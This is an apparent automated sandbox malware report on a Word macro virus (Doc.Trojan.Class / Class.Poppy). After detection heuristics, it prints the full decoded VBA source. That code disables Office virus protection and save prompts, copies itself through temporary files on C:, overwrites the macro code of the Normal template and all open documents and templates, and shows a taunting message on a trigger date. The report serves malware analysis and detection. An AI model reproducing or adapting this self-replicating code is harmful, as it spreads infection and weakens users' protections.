MALICIOUS
264
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample exhibits multiple high-severity heuristics indicating the presence of legacy WordBasic macro-virus markers and active VBA macros, including AutoOpen, Document_Open, and Auto_Close. The VBA script attempts to disable virus protection and save macro code to 'c:\class.sys', suggesting it is a downloader or dropper for a secondary payload. The ClamAV detections further confirm its malicious nature.
Heuristics 7
-
ClamAV: Doc.Trojan.Class-37 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Class-37
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoOpen() -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Document_Open -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
.replaceline 1, "Sub AutoClose()" -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5966 bytes |
SHA-256: 5511f5ee3ab6c4b3dae60cbdd1c9928ec014ab339d456b7af1e453bc84d552a8 |
|||
|
Detection
ClamAV:
Doc.Trojan.Class-5
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
Sub autoOpen()
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
On Error GoTo out
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
Options.VirusProtection = False
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
Options.SaveNormalPrompt = False
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
Options.ConfirmConversions = False
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
ad = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
nt = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
If nt > 70 And ad > 0 Then GoTo out
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
If nt < 70 Then
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
Set host = NormalTemplate.VBProject.VBComponents.Item(1)
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
ActiveDocument.VBProject.VBComponents.Item(1).Name = host.Name
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\class.sys"
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
End If
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
If ad = 0 Then Set host = ActiveDocument.VBProject.VBComponents.Item(1)
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
If Day(Now) = 14 And (Month(Now) > 5) Then MsgBox "I Think " & Application.UserName & " is a big stupid jerk!", 0, "VicodinES Loves You / Class.Poppy"
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
host.CodeModule.AddFromFile ("c:\class.sys")
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
With host.CodeModule
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
For x = 1 To 4
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
.DeleteLines 1
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
Next x
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
End With
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
If nt < 70 Then
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
With host.CodeModule
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
.replaceline 1, "Sub AutoClose()"
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
.replaceline 71, "Sub ToolsMacro()"
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
End With
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
End If
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
With host.CodeModule
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
For x = 2 To 72 Step 2
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
.replaceline x, "'" & Application.UserName & Now & Application.ActivePrinter & Application.ActiveWindow
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
Next x
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
End With
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
out:
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
If nt > 70 And ad = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
Sub ToolsMacro()
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
Sub ViewVBCode()
'Arvind4/1/99 9:36:40 AMHP LaserJet 6P/6MP - Enhanced on LPT1:clip
End Sub
Private Sub Document_Close()
On Error Resume Next
Kill "c:\footprint.$$?"
Document_Open
End Sub
Private Sub Document_New()
Document_Open
End Sub
Private Sub Document_Open()
On Error Resume Next
Dim al As String
Dim adoc As Document
Dim atpl As Template
Dim CoL As Integer
ThisDocument.VBProject.VBComponents("ThisDocument").Export "c:\footprint.$$$"
Open "c:\footprint.$$$" For Input As #1
Open "c:\footprint.$$1" For Output As #2
Line Input #1, al
Line Input #1, al
Line Input #1, al
Line Input #1, al
While Not EOF(1)
Line Input #1, al
Print #2, al
Wend
Close 1
Close 2
For Each adoc In Documents
adoc.Sections(1).Footers(wdHeaderFooterPrimary).Range.Text = adoc.FullName
If Not adoc.CustomDocumentProperties("FootPrint1") Then
adoc.CustomDocumentProperties.Add Name:="FootPrint1", LinkToContent:=False, Value:=True, Type:=msoPropertyTypeBoolean
CoL = adoc.VBProject.VBComponents("ThisDocument").CodeModule.CountOfLines
adoc.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, CoL
adoc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "c:\footprint.$$1"
End If
Next
For Each atpl In Templates
If Not atpl.CustomDocumentProperties("FootPrint1") Then
atpl.CustomDocumentProperties.Add Name:="FootPrint1", LinkToContent:=False, Value:=True, Type:=msoPropertyTypeBoolean
CoL = atpl.VBProject.VBComponents("ThisDocument").CodeModule.CountOfLines
atpl.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, CoL
atpl.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "c:\footprint.$$1"
End If
Next
NormalTemplate.Save
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.